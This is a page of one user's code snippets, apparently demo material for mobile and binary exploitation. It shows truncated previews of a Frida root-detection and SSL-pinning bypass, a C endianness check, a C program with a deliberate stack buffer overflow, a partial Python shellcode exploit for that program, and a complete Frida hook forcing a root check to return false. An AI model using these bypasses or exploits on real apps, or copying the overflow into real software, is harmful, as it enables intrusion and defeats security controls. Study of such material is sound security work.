
@saibikalpa
saibikalpa / root-ssl-pin-bypass.js
Last active June 2, 2022 08:25
Root detection & SSL pinning bypass with Frida
Java.perform(function(){
console.log("\nRoot detection & SSL pinning bypass with Frida");
var CertificateFactory = Java.use("java.security.cert.CertificateFactory");
var FileInputStream = Java.use("java.io.FileInputStream");
var BufferedInputStream = Java.use("java.io.BufferedInputStream");
var X509Certificate = Java.use("java.security.cert.X509Certificate");
var KeyStore = Java.use("java.security.KeyStore");
var TrustManagerFactory = Java.use("javax.net.ssl.TrustManagerFactory");
var SSLContext = Java.use("javax.net.ssl.SSLContext");
var Volley = Java.use("com.android.volley.toolbox.Volley");
@saibikalpa
saibikalpa / endian.c
Created January 8, 2019 06:35
Sample C program to determine endianness
#include <stdio.h>
/*
 * Overlay used by the endianness probe: both members start at the same
 * address, so reading `b` after writing `n` yields the byte stored at the
 * lowest address of the integer.
 */
union s {
    int  n;   /* full integer value written by the probe */
    char b;   /* first (lowest-address) byte of n */
} x;          /* single global instance shared with main() */
void main(){
x.n = 0x4142;
if(x.b == 0x42){
printf("Little Endian\n");
}
@saibikalpa
saibikalpa / bof_demo.c
Created January 8, 2019 06:34
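Sample C program vulnerable to a stack buffer overflow: foo() calls read() with a 1000-byte limit on a 600-byte buffer (bounding the read to sizeof(buffer) would remove the overflow)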
#include <stdio.h>
#include <unistd.h>
int foo(){
char buffer[600];
int characters_read;
printf("Enter some string:\n");
characters_read = read(0, buffer, 1000);
printf("You entered: %s", buffer);
return 0;
@saibikalpa
saibikalpa / bof_demo_exploit.py
Created January 8, 2019 06:30
Sample 64-bit buffer overflow exploit
from struct import pack
payload_len = 616
nop = "\x90"*300
rip = 0x00007fffffffdefc
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\x4b\x39\x49\xc0\x26\xc4\xb7"
buf += "\x43\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
@saibikalpa
saibikalpa / root-detection-bypass.js
Created January 8, 2019 06:15
Sample root detection bypass script
/*
 * Frida instrumentation script for an Android app under test.
 *
 * Inside the Java VM context it swaps the implementation of
 * utils.DeviceUtils.isDeviceRooted() for one that always returns false.
 * The hook shows that a root check implemented as a single in-process
 * boolean method can be overridden by anyone able to instrument the
 * process, so it should not be the only control an app relies on.
 */
Java.perform(function () {
  console.log("\nRoot detection bypass with Frida");

  // Frida wrapper around the app class that performs the root check.
  var rootCheckClass = Java.use("utils.DeviceUtils");
  var rootCheckMethod = rootCheckClass.isDeviceRooted;

  console.log("\nHijacking isDeviceRooted function in DeviceUtils class");

  // Replacement body: log each invocation, then report "not rooted".
  rootCheckMethod.implementation = function reportNotRooted() {
    console.log("\nInside the isDeviceRooted function");
    return false;
  };

  console.log("\nRoot detection bypassed");
});